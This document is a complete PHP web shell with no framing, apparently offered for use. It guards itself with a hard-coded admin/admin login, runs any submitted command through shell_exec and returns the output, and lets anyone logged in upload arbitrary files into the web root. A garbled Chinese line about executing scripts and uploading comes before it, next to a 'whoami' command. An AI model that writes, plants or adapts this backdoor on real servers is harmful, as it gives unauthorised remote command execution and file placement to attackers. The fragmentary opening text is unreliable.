可使用脚本 上执行传

whoami 可使用脚本 上执行传

<?php
session_start();

function is_windows() {
    return strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    if ($_POST['username'] == 'admin' && $_POST['password'] == 'admin') {
        $_SESSION['authenticated'] = true;
    }
}

if (!isset($_SESSION['authenticated'])) {
    echo '<form method="post" style="text-align:center;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);">
            <label>Username: <input type="text" name="username"></label><br>
            <label>Password: <input type="password" name="password"></label><br>
            <input type="submit" value="Login">
          </form>';
    exit();
}

if (isset($_POST['command'])) {
    $command = $_POST['command'];
    if (is_windows()) {
        $output = shell_exec($command);
    } else {
        $output = shell_exec($command . ' 2>&1');
    }
    echo nl2br(htmlspecialchars($output));
}

if (isset($_FILES['uploaded_file'])) {
    move_uploaded_file($_FILES['uploaded_file']['tmp_name'], './' . basename($_FILES['uploaded_file']['name']));
    echo "File uploaded successfully.";
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Command Execution</title>
</head>
<body>
    <h1>Execute Command</h1>
    <form method="post">
        <label>Command: <input type="text" name="command"></label><br>
        <input type="submit" value="Execute">
    </form>

    <h1>Upload File</h1>
    <form enctype="multipart/form-data" method="post">
        <label>File: <input type="file" name="uploaded_file"></label><br>
        <input type="submit" value="Upload">
    </form>
</body>
</html>